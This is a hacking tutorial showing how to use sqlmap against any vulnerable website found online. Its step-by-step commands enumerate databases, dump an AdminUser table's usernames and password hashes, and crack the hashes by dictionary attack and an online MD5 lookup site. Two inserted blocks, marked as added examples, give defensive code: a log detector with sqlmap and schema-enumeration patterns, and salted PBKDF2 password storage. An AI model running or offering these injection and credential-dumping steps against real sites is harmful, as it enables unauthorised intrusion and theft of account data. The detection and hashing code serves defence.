
How To Hack Vulnerable Website With SQLMAP


Hack a website and take over its database using SQLMAP.


What is SQLMAP?

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
SQLMAP is pre-installed on Kali Linux.
It has many more features; in this article we will see how you can take over the database with SQLMAP. If you want to do extra research on SQLMAP and its features, visit the official website.
Before using SQLMAP, we need a vulnerable website, so find one.
Paste the URL into your browser. Let's say you have pasted the following URL:
http://www.demo.com/form.php?id=5
Now, to check whether the website is vulnerable to injection, just add a single quotation mark ' at the end of the URL. Your address should now look like this:
http://www.yourtarget.com/form.php?id=5'
If it returns a database error, then the website is vulnerable to injection.
Once you have your target ready, open your terminal and type the following command. It displays all the options that you can use with SQLMAP. Go through them.
root@seven:~# sqlmap -h
Usage: python sqlmap [options]
Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
Target:
    At least one of these options has to be provided to define the
    target(s)
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs
Request:
    These options can be used to specify how to connect to the target URL
    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly
Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts
    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value
    -a, --all           Retrieve everything

Grab all the databases

The first thing we need to do is to look for all the available databases on the website. The syntax goes like this:
Syntax:
sqlmap -u [URL] --dbs
-u   is for the URL.
--dbs   enumerates the DBMS databases. It fetches all the databases behind the website.
Complete command:
root@seven:~# sqlmap -u www.yourtarget.com/index.php?id=31 --dbs 
When it reports that the back-end DBMS looks like 'MySQL' and asks "Do you want to skip test payloads specific for other DBMSes?", just press y. sqlmap has detected the back-end database, in this case MySQL, so press y and skip further testing. Press y at the very next prompt too.
Wait a few minutes until it finishes. On successful completion, it will list all the databases on the website.
The information_schema database is a standard database on every MySQL server, so ignore it.
So we are interested in the other database (guru). Now choose a database that you want to exploit. I am going to exploit guru.
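From the defender's side, the requests in this walkthrough are visible in the web server's access log. The following added example (not from the original article) flags them per client; the log lines are constructed, and the sqlmap User-Agent version string in them is a sample value.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines in combined log format (not from the article).
SAMPLE_LOG = [
    '203.0.113.20 - - [10/Mar/2024:09:59:58 +0000] "GET /form.php?id=5 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2024:10:00:05 +0000] "GET /form.php?id=5%27 HTTP/1.1" 500 120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2024:10:02:11 +0000] "GET /product_detail.php?ID=41 HTTP/1.1" 200 900 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '198.51.100.7 - - [10/Mar/2024:10:02:12 +0000] "GET /product_detail.php?ID=41%20UNION%20SELECT%20table_name%20FROM%20information_schema.tables HTTP/1.1" 200 950 "-" "Mozilla/5.0"',
]

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def classify(line):
    """Return (client_ip, reasons) for one log line, or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    reasons = []
    # The help output above lists --random-agent, so a User-Agent match
    # alone is not enough; the parameter checks below do not depend on it.
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap_user_agent")
    query = unquote_plus(urlsplit(m["target"]).query)
    if "'" in query or '"' in query:
        reasons.append("quote_in_parameter")
    if re.search(r"information_schema", query, re.IGNORECASE):
        reasons.append("schema_enumeration")
    if reasons and m["status"].startswith("5"):
        reasons.append("server_error_on_probe")
    return m["ip"], reasons

def suspicious_clients(lines):
    """Group every reason seen per client IP across the log."""
    hits = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            hits.setdefault(parsed[0], set()).update(parsed[1])
    return hits

if __name__ == "__main__":
    for ip, reasons in suspicious_clients(SAMPLE_LOG).items():
        print(ip, sorted(reasons))
```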

Extract Tables inside database

Once you have chosen the database that you want to exploit, we need to look at its tables.
You have to give two parameters:
Syntax:
sqlmap -u [URL] -D Database_name --tables
  1. -D: the database option; you must give the name of the database that you want to exploit.
  2. --tables: extracts the tables inside the database.
Complete Command:
root@seven:~# sqlmap -u http://target.com/product_detail.php?ID=41 -D guru --tables
Replace Database_name with the database that you want to exploit.
As you can see, we have fetched the tables. There are plenty of tables, but we are interested in AdminUser.


Extract columns

The next thing you will be interested in is the columns of the table. Now that we have a table that we want to exploit, we have to extract its columns:
  1. -D: the database option; you must give the database name.
  2. -T: the table name.
  3. --columns: retrieves the columns inside the table.
Complete command:
root@seven:~# sqlmap -u http://target.com/product_detail.php?ID=41 -D guru -T AdminUser --columns
When it finishes, it displays all the columns inside the table. Now we know our columns. Go through them; you may find interesting columns such as usernames, passwords and emails. I am going to start with the usernames stored in the USR_Username column. You need to give the following options:
  1. -D: the database to access.
  2. -T: the table to access.
  3. -C: the column to access.
  4. --dump: extracts the data inside the column.
Full command:
root@seven:~# sqlmap -u http://target.com/product_detail.php?ID=41 -D guru -T AdminUser -C USR_Username --dump
We have found two admin accounts here. Now we need the password.
If there are many users, retrieval takes time, so we can use the --threads option for faster data retrieval.
root@seven:~# sqlmap -u http://target.com/product_detail.php?ID=41 -D guru -T AdminUser -C USR_Username --dump --threads 7
It's time to see the password column. The command stays the same except for the column name, so replace the USR_Username (username) column with USR_Password (password).
root@seven:~# sqlmap -u http://target.com/product_detail.php?ID=41 -D guru -T AdminUser -C USR_Password --dump
Of course, the password will not be presented in plain text, so we have to crack it. You will be asked whether to crack the password using a dictionary-based attack; press y and hit Enter.
Now press 1 to use the default dictionary; if you have a custom dictionary file, specify its path instead. Once you press 1, it will start cracking the hashes. In most cases, hashes will not be cracked with the default dictionary file.
It did not find any passwords, so we have to look for other alternatives. There are lots of online MD5 decrypters.
So make a note of your hashes. We will use the Hash Killer website to crack the hash.
Go to Hash Killer to crack the hash. Paste the hash on the right side at the bottom, fill in the captcha and click the submit button. The cracked hash will be shown along with the hash on the right side; I have cracked my hash successfully.
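The hashes in this walkthrough fall to a lookup site because they are plain MD5. The following added example (not from the original article) shows a salted, slow replacement using PBKDF2 and an upgrade-on-login path for legacy rows; the storage format, the function names and the iteration count are assumptions.

```python
import hashlib
import hmac
import os
import re

PBKDF2_ITERATIONS = 600_000  # assumption: tune to your hardware and policy

def md5_unsalted(password):
    """Legacy scheme: same password always gives the same 32-hex digest."""
    return hashlib.md5(password.encode()).hexdigest()

def hash_password(password):
    """Salted PBKDF2-HMAC-SHA256 in a self-describing string format."""
    salt = os.urandom(16)  # per-user salt defeats precomputed lookups
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                             PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"

def _verify_pbkdf2(password, stored):
    try:
        _, iters, salt_hex, dk_hex = stored.split("$")
        dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    except ValueError:
        return False  # malformed record
    return hmac.compare_digest(dk.hex(), dk_hex)

def verify_and_upgrade(password, stored):
    """Return (ok, replacement). A legacy MD5 row that verifies yields a
    PBKDF2 replacement the caller should write back to the user table."""
    if stored.startswith("pbkdf2_sha256$"):
        return _verify_pbkdf2(password, stored), None
    if re.fullmatch(r"[0-9a-fA-F]{32}", stored):
        ok = hmac.compare_digest(md5_unsalted(password), stored.lower())
        return ok, (hash_password(password) if ok else None)
    return False, None

if __name__ == "__main__":
    legacy = md5_unsalted("Summer2024!")  # constructed sample password
    print("legacy row:", legacy)
    ok, replacement = verify_and_upgrade("Summer2024!", legacy)
    print("login ok:", ok)
    print("store instead:", replacement)
```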



That is how to hack a vulnerable website with SQLMAP. Hope you like this article; keep sharing it with others too. Also, share your experience with us in the comment box below.
